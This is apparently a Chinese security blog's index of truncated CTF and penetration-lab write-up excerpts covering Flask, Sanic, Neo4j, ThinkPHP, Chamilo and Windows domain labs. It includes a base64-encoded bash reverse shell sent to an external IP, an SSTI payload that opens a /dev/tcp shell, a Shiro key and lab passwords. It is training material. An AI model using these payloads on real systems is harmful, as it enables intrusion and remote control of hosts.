A day in AsaL1n

2024 n00bzctf web wp 最近回到家里 煞笔浙江40多度 不想出门 看了好几天春秋杯的那个mycms 没啥思路 想摆了（划掉） 逛网站 在CTF赛事中心 - Bugku CTF 发现了这个比赛 上来玩玩 题目不是很难 一个小时就ak了。。。水点博客 Passwordless代码 1234567891011121314151617181920212223242526272829303132#!/usr/bin/env python3from flask import Flask, request, redirect, render_template, render_template_stringimport subprocessimport urllibimport uuidglobal leetapp = Flask(__name__)flag = open('/flag.txt').read()leet=uuid.UUID('13371337-1337-1337-1337-133713371337')@app.rou ...

从ciscn2024 sanic和DASCTF2024 Sanic’s revenge 学sanic原型链污染 四川回来 给机房带来了久违的流感 ciscn2024 sanic访问/src给出源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=[&# ...

2024 ciscn 决赛 记录+部分wp 第一次国赛决赛 还是很激动的一次比赛 感谢A1natas的小伙伴给予我的帮助 最后混了一个二等奖 day0从杭州萧山飞到成都 四川话听起来还是巴适 这里我就不得不吐槽某一个队员的方言了 比赛举办在四川大学 酒吧舞就是不一样啊 学校看起来就是牛逼 场地在体育馆（怎么又是体育馆 想起来某一次比赛的经历了 说的就是华东南） 开了空调 这空调嘎嘎得劲 回去就吹感冒了 成都是真的不夜城 晚上11点了还是灯火通明 晚上吃了顿火锅（都来四川了不试试？）我草好辣（已老实求放过） 晚上才看到要配置相关可信计算的环境（主办方现在才发 也是厉害的）环境配置到凌晨两点多 第二天起来感觉要寄了 day1第一天是可信计算+awdp 做了点web 然后看边上的大哥对着计算无能狂怒 awdp 绝对是防守修复放在第一位的 防守check过了之后 每一次都可以继续得分 ezjs fix不许上传ejs文件 但是应该是可以存在rce的 直接加上一个对ejs文件的文件内部文件过滤 随便过滤点就成功修了 break攻击的话 有很多的思路 赛后发现可以是往 n ...

春秋云镜-ThermalPower外网使用nmap扫描所给的web服务 访问8080 使用dirsearch扫描泄露文件 确定是heapdump泄露 下载泄露文件 分析得到shirokey 1algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES shiro attack一把梭 得到flag1 弹shell出来 搭建代理 走代理的扫描有点问题 还是上传之后扫描 172.22.17.6:21存在一个ftp服务 可以匿名登录 1proxychains ftp 172.22.17.6 连接很不稳定 直接使用浏览器访问 在SCADA 得到一个用户密码 123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3 fscan扫描 查看 注意到有一个内部员工通讯录和一个火创能源内部通知 注意到初始账号密码格式 scada工程师只有这些 也就是这些密码 12345678910chenhua/chenhua@0813zh ...

感觉已经国赛已经寄了 四川旅游计划 启动 春秋云镜-Tsclient外网先扫描端口 尝试爆破mssql的账号密码 得到密码为1qaz!QAZ 成功登录mssql 激活xpcmdshell 成功执行命令 msf生成shell 反弹到自己的vps上面来 使用msf自动提权 得到第一个flag 搭建隧道 把流量传出来 扫描内网 1234567891011121314151617181920212223[*] 172.22.8.31 XIAORANG\WIN19-CLIENT [*] 172.22.8.15 [+]DC XIAORANG\DC01 [*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows ServerNetInfo:[*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b ...

春秋云镜-Time外网 nmap扫描端口 只扫描出来22端口 令我很是疑惑 用goby进行信息收集 注意到开启了7474端口 直接访问 存在Neo4j shell 漏洞 CVE-2021-34371 脚本一把梭 1java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.98.127.126:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI5LjIwMi4xNjQvMzIzMiAwPiYx}|{base64,-d}|{bash,-i}" 成功反弹shell 在tmp目录下上传fscan 查看当前网段 12当前内网IP 172.22.6.36./fscan -h 177.22.6.36/16 >> out.txt 找到以下主机 123[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2 ...

我顶！ 春秋云镜-Initial外网开始的时候给了一个ip 直接扫描端口 80端口 上去看看 注意到是title 明显是thinkphp 工具跑一下 发现存在ThinkPHP 5.0.23 RCE 一键getshell之后 蚁剑连接 上传linux-exploit-suggester 到tmp目录下 提权 可以看到sudo 提权 sudo -l 查看 mysql存在sudo权限 注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权 得到flag1 1flag{60b53231- 查看内网ip 上传 fscan 扫描内网 搭建代理 传递流量出来 172.22.1.18 弱密码admin/admin123 登录 网上翻找有没有payload 12345678910111213141516171819202122232425262728293031323334import requestssession = requests.session()url_pre = 'http://172.22 ...

HTB PERMX 逛htb的时候发现有个seasonal挑战 看看又是简单题 我就玩玩 这次我选择使用window 的openvpn链接上那边环境 方便我使用本地的工具啥的 扫到了奇奇怪怪的服务 先访问80端口 域名为http://permx.htb/ 写入hosts文件之后成功访问 没什么东西 好像是静态网页爆破一下子域名 爆破出来一个lms域名 一个cms 上网查到一个cve CVE-2023-4220-Chamilo 直接存在工具 拿来打 成功写入webshell 使用工具反弹shell出来 查看本地ip 当前是wwwdata权限 无权进入mtz 的home 注意到存在/var/www/chamilo/app/config目录 读取到数据库 chamilo 03F6lY3uXAP2bkW8 数据库翻了翻 没找到什么关键信息 猜测数据库和ssh同密码 尝试直接ssh登录 成功登录 尝试提权 注意到存在 /opt/acl.sh 可以给任意用户 任意文件的任意权限 我们可以给与&#x ...

php代码审计-Thinkphp<5.* 自己对于这种大项目的审计能力还是很差 从先从最经典的thinkphp开始学起 Thinkphp2.x远古项目 在vulhub/thinkphp-2.1: 互联网考古，ThinkPHP2.1带示例和文档完整包 (github.com)下载 配置环境的时候切记使用apache 使用nignx会莫名其妙的各种问题 环境 php5.59 thinkphp2.1x 路由分析主要控制路由的文件在ThinkPHP内置的Dispatcher类里面 这个类负责把路由映射到对应的控制器上 调用自己的self::routerCheck()方法 查看当前的路由规则 路由包括好几种 不过都大差不差 123456789101112131415if(0 === stripos($regx.$depr,$route[0].$depr)) { // 简单路由定义：array('路由定义','分组/模块/操作名', '路由对应变量','额外参数& ...

2024 春秋杯 花点时间看了点题目 还是很好玩的 最后有点事情出去了 awdp最后一题没看 回头空了看看 初探勒索病毒按照要求复现即可 运行三条命令 123sed -i 's/flags/"flags"/' ./decryptblocks.pyexport SRL_IGNORE_MAGIC=1./decryptblocks.py ./banana.jpg.sah28vut5 ./key.block cp改一下后缀 得到flag brother一眼ssti注入 随便找一个payload 弹个shell出来看看 1{%for(x)in().__class__.__base__.__subclasses__()%}{%if%27war%27in(x).__name__%20%}{{x()._module.__builtins__[%27__import__%27](%27os%27).popen(%27bash -c 'bash -i >& /dev/tcp ...